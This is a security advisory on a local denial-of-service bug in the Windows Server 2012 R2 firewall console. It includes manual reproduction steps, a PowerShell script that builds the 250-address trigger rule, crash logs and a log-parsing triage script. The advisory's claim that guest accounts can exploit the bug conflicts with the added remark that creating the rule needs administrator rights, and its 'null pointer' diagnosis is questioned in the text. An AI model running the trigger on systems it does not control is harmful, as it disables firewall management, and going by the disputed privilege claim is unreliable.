Document Title:
===============
Microsoft Windows 2012 R2 x64 - (MMC) DoS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2235
MSRC ID: 58288
Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2020/04/29/microsoft-windows-2012-r2-x64-mmc-local-dos-vulnerability
Release Date:
=============
2020-04-28
Vulnerability Laboratory ID (VL-ID):
====================================
2235
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Denial of Service
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Microsoft Windows Server 2012, working title Microsoft Windows Server 8, is an operating system of the Windows series from
the software manufacturer Microsoft and the successor to Windows Server 2008 R2. It is the server version of
Windows 8 and was released on September 4, 2012; its further development, Windows Server 2012 R2, followed in October 2013.
Support for Windows Server 2012 R2, and thus the delivery of security updates, ends on October 10, 2023.
(Copy of the Homepage: https://de.wikipedia.org/wiki/Microsoft_Windows_Server_2012)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the official Microsoft Windows 2012 R2 operating system.
Vulnerability Disclosure Timeline:
==================================
2020-04-26: Researcher Notification & Coordination (Security Researcher)
2020-04-27: Vendor Notification (Security Department)
2020-04-29: Vendor Response/Feedback (Security Department)
2020-04-29: Vendor Fix/Patch (Won't Fix - OS Support)
2020-04-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official Microsoft Windows 2012 R2 (x64) operating system.
The denial of service vulnerability allows local attackers to crash or freeze the application, a process or its inbound components.
Windows 2012 R2 ships a basic firewall (Windows Firewall with Advanced Security) in which specific rule sets can be defined. Defining a
block policy that lists a large number of IP addresses (above 200) can corrupt mmc.exe (Microsoft Management Console). The snapshot of
the current console session is corrupted by the error, which results in a simple but stable application crash. The crash occurs in the
kernelbase dynamic link library (KERNELBASE.dll) because the counted IP items in the list are returned with a null pointer. The problem
is triggered through the Inbound Rules - New Rule (Add) function. According to the researcher the issue can be exploited by local low
privileged user accounts without user interaction. The issue only affects the x64 editions of Windows 2012 R2. Local attackers are able
to crash mmc.exe, which leaves several local security measures malfunctioning. Triggering the issue results two times in an application
hang and, on the third attempt, in a final uncaught exception that crashes the full process. After the crash the Windows Firewall with
Advanced Security dialog offers to recover the snapshot, but clicking OK corrupts the process again.
Successful exploitation of the local vulnerability results in mmc.exe process crashes, snapshot corruptions or missing security functions.
Request Method(s):
[+] Local
Vulnerable Module(s):
[+] Firewall - Incoming rules
Vulnerable Function(s):
[+] New Rule (Add) - (Local IP / Remote IP)
DLL(s):
[+] Kernelbase
Proof of Concept (PoC):
=======================
The local denial of service via pointer corruption can be exploited by local attackers with a low privileged user account and without user interaction.
For security demonstration or to reproduce the local denial of service vulnerability, follow the information and steps below.
Manual steps to reproduce the vulnerability ...
1. Open the local firewall (Windows Firewall with Advanced Security, wf.msc)
2. Set up a new inbound rule
3. Set the action to block all
4. Include IP addresses above the mentioned limit (200) in the rule scope (Local IP / Remote IP)
5. Save the rule; the console then creates a local snapshot of the session automatically
6. An application hang occurs two times in the process and finally, on the third attempt, it crashes with an uncaught null pointer exception
Note: At that point several Windows messages pop up offering to recover the snapshot, which results in another error
7. Press OK and the mmc.exe process crashes permanently
8. Successful reproduction of the local vulnerability!
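The rule from steps 2 to 4 can also be created from PowerShell instead of the wf.msc wizard, which makes the address count exact and repeatable. The script below is an added example and is not part of the Vulnerability-Lab advisory; the rule name, the TEST-NET-1 address range and the count of 250 are assumptions chosen for the example. New-NetFirewallRule, like the firewall snap-in, has to run from an elevated (administrator) session, and the hang and crash the advisory describes happen in the console when the rule is opened there (steps 5 to 7), not in the cmdlet itself.

```powershell
# Added example (not from the advisory): build the PoC block rule with PowerShell and
# verify how many addresses it carries before opening it in the console.
# Assumptions: rule name, address range (192.0.2.0/24, TEST-NET-1) and the count of 250.

$RuleName     = 'VL-2235 Block Test'   # assumed name, not from the advisory
$AddressCount = 250                    # above the 200-address threshold named in the advisory

# Constructed scope: 250 individual addresses from the documentation range.
$RemoteAddresses = 1..$AddressCount | ForEach-Object { "192.0.2.$_" }

# Start clean: drop a leftover rule from an earlier run, if any.
Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue | Remove-NetFirewallRule

# Steps 2-4 of the PoC: new inbound rule, action Block, scope limited to the address list.
# Use -LocalAddress instead of -RemoteAddress to test the "Local IP" variant.
New-NetFirewallRule -DisplayName $RuleName `
    -Direction Inbound `
    -Action Block `
    -Profile Any `
    -RemoteAddress $RemoteAddresses `
    -Enabled True | Out-Null

# Check: read the scope back and confirm the stored address count.
$Scope  = Get-NetFirewallRule -DisplayName $RuleName | Get-NetFirewallAddressFilter
$Loaded = @($Scope.RemoteAddress).Count
"Rule '$RuleName' stored with $Loaded remote addresses"

if ($Loaded -le 200) {
    Write-Warning "Only $Loaded addresses stored; the trigger condition (above 200) is not met"
}

# Steps 5-7 happen in the console: open wf.msc, go to Inbound Rules and open the rule's
# Scope tab. The advisory reports two hangs and then an APPCRASH of mmc.exe.
# Clean up afterwards with:
#   Remove-NetFirewallRule -DisplayName $RuleName
```

Run this on an isolated test server only; the rule blocks inbound traffic from every listed address while it exists.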
--- Application Error Logs ---
EventType=AppHangTransient
EventTime=132277138943110905
ReportType=3
Consent=1
ReportIdentifier=a43305c3-5d4e-11ea-813c-0025904667c6
IntegratorReportIdentifier=a43305c4-5d4e-11ea-813c-0025904667c6
NsAppName=mmc.exe
Response.type=4
Sig[0].Name=Problem Signature 01
Sig[0].Value=mmc.exe
Sig[1].Name=Problem Signature 02
Sig[1].Value=6.3.9600.18910
Sig[2].Name=Problem Signature 03
Sig[2].Value=5a57a503
Sig[3].Name=Problem Signature 04
Sig[3].Value=unknown
Sig[4].Name=Problem Signature 05
Sig[4].Value=unknown
Sig[5].Name=Problem Signature 06
Sig[5].Value=unknown
Sig[6].Name=Problem Signature 07
Sig[6].Value=unknown
DynamicSig[1].Name=OS Version
DynamicSig[1].Value=6.3.9600.2.0.0.272.7
DynamicSig[2].Name=Locale ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Additional Crash Signature 1
DynamicSig[22].Value=a170a78f269a790e02a336f2ab0610cd
DynamicSig[23].Name=Additional Crash Signature 2
DynamicSig[23].Value=0e01
DynamicSig[24].Name=Additional Crash Signature 3
DynamicSig[24].Value=0e01d9273132497b58cc3792f8af657a
DynamicSig[25].Name=Additional Crash Signature 4
DynamicSig[25].Value=4eb3
DynamicSig[26].Name=Additional Crash Signature 5
DynamicSig[26].Value=4eb3372730c134255f47918244aa9d46
DynamicSig[27].Name=Additional Crash Signature 6
DynamicSig[27].Value=a3b5
DynamicSig[28].Name=Additional Crash Signature 7
DynamicSig[28].Value=a3b5abeb685bc26ab46653aa60185a6e
... (the AppHangTransient report above is recorded three times, once per hang; the third attempt produces the APPCRASH report below)
EventType=APPCRASH
EventTime=132277153626144152
ReportType=2
Consent=1
ReportIdentifier=0f6ea181-5d52-11ea-813c-0025904667c6
IntegratorReportIdentifier=0f6ea180-5d52-11ea-813c-0025904667c6
Response.type=4
Sig[0].Name=Application Name
Sig[0].Value=mmc.exe
Sig[1].Name=Application Version
Sig[1].Value=6.3.9600.18910
Sig[2].Name=Application Timestamp
Sig[2].Value=5a57a503
Sig[3].Name=Fault Module Name
Sig[3].Value=KERNELBASE.dll
Sig[4].Name=Fault Module Version
Sig[4].Value=6.3.9600.19425
Sig[5].Name=Fault Module Timestamp
Sig[5].Value=5d26b6e9
Sig[6].Name=Exception Code
Sig[6].Value=00000000
Sig[7].Name=Exception Offset
Sig[7].Value=000000000000908c
Screenshots:
https://ibb.co/CbThqJs
https://ibb.co/qNcPLhm
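The error logs above are Windows Error Reporting (WER) Report.wer records in their key=value form. Two checks are worth having when triaging a report like this on an affected server: parse the report so the signature fields can be compared across the three hangs and the final crash, and query the Application event log for the matching hang (Event ID 1002) and crash (Event ID 1000) events of mmc.exe. One caveat on the crash report: the APPCRASH signature shows exception code 00000000 at an offset inside KERNELBASE.dll rather than the 0xC0000005 access violation that a null pointer dereference normally raises, so the "null pointer" wording should be read as the researcher's interpretation until a debugger confirms it. The script below is an added example, not part of the advisory; the embedded sample is a shortened copy of the APPCRASH report above with the labels translated, the WER directories are the standard ReportArchive and ReportQueue locations, and the function names are assumptions.

```powershell
# Added example (not from the advisory): parse WER Report.wer records and look up the
# matching Application-log events for mmc.exe. Function names are assumptions.

function Parse-WerReport {
    # Turns the key=value lines of a Report.wer file into one hashtable. Sig[n].Name /
    # Sig[n].Value pairs are also stored under the (localized) signature name.
    param([string[]]$Lines)
    $report = @{}
    $sigs   = @{}
    foreach ($line in $Lines) {
        if ($line -match '^([^=]+)=(.*)$') {
            $key, $value = $Matches[1], $Matches[2]
            $report[$key] = $value                       # raw key, e.g. Sig[3].Value
            if ($key -match '^(.*Sig\[\d+\])\.(Name|Value)$') {
                $id, $field = $Matches[1], $Matches[2]
                if (-not $sigs.ContainsKey($id)) { $sigs[$id] = @{} }
                $sigs[$id][$field] = $value
            }
        }
    }
    foreach ($s in $sigs.Values) { if ($s.Name) { $report[$s.Name] = $s.Value } }
    return $report
}

function Get-WerSummary {
    # Positional Sig[n] keys follow the APPCRASH layout shown in the advisory, so the
    # summary works regardless of the locale the labels were written in.
    param([hashtable]$Report)
    [pscustomobject]@{
        EventType       = $Report['EventType']
        Application     = $Report['Sig[0].Value']
        AppVersion      = $Report['Sig[1].Value']
        FaultModule     = $Report['Sig[3].Value']
        ExceptionCode   = $Report['Sig[6].Value']
        ExceptionOffset = $Report['Sig[7].Value']
        # c0000005 is the access violation a null dereference would produce
        AccessViolation = ($Report['Sig[6].Value'] -eq 'c0000005')
    }
}

function Find-MmcCrashEvents {
    # Event ID 1000 (Application Error) and 1002 (Application Hang) in the Application log;
    # Properties[0] carries the faulting/hanging application name in both.
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Application'; Id = 1000, 1002; StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[0].Value -eq 'mmc.exe' } |
        Select-Object TimeCreated, Id, ProviderName,
            @{ n = 'Detail'; e = { $_.Message.Split("`n")[0] } }
}

# Constructed sample: shortened copy of the APPCRASH report from the advisory.
$Sample = @'
EventType=APPCRASH
Sig[0].Name=Application Name
Sig[0].Value=mmc.exe
Sig[1].Name=Application Version
Sig[1].Value=6.3.9600.18910
Sig[3].Name=Fault Module Name
Sig[3].Value=KERNELBASE.dll
Sig[6].Name=Exception Code
Sig[6].Value=00000000
Sig[7].Name=Exception Offset
Sig[7].Value=000000000000908c
'@ -split "`r?`n"

Get-WerSummary (Parse-WerReport $Sample) | Format-List

# On the affected server: scan the real WER store for mmc.exe reports.
$WerDirs = 'C:\ProgramData\Microsoft\Windows\WER\ReportArchive',
           'C:\ProgramData\Microsoft\Windows\WER\ReportQueue'
Get-ChildItem $WerDirs -Recurse -Filter Report.wer -ErrorAction SilentlyContinue |
    ForEach-Object { Parse-WerReport (Get-Content $_.FullName) } |
    Where-Object { $_['Sig[0].Value'] -eq 'mmc.exe' -or $_['NsAppName'] -eq 'mmc.exe' } |
    ForEach-Object { Get-WerSummary $_ }

Find-MmcCrashEvents -Days 7 | Format-Table -AutoSize
```

For the sample report the summary shows FaultModule KERNELBASE.dll with AccessViolation False, which is the point of the caveat above. Reading the WER directories requires local administrator rights.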
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™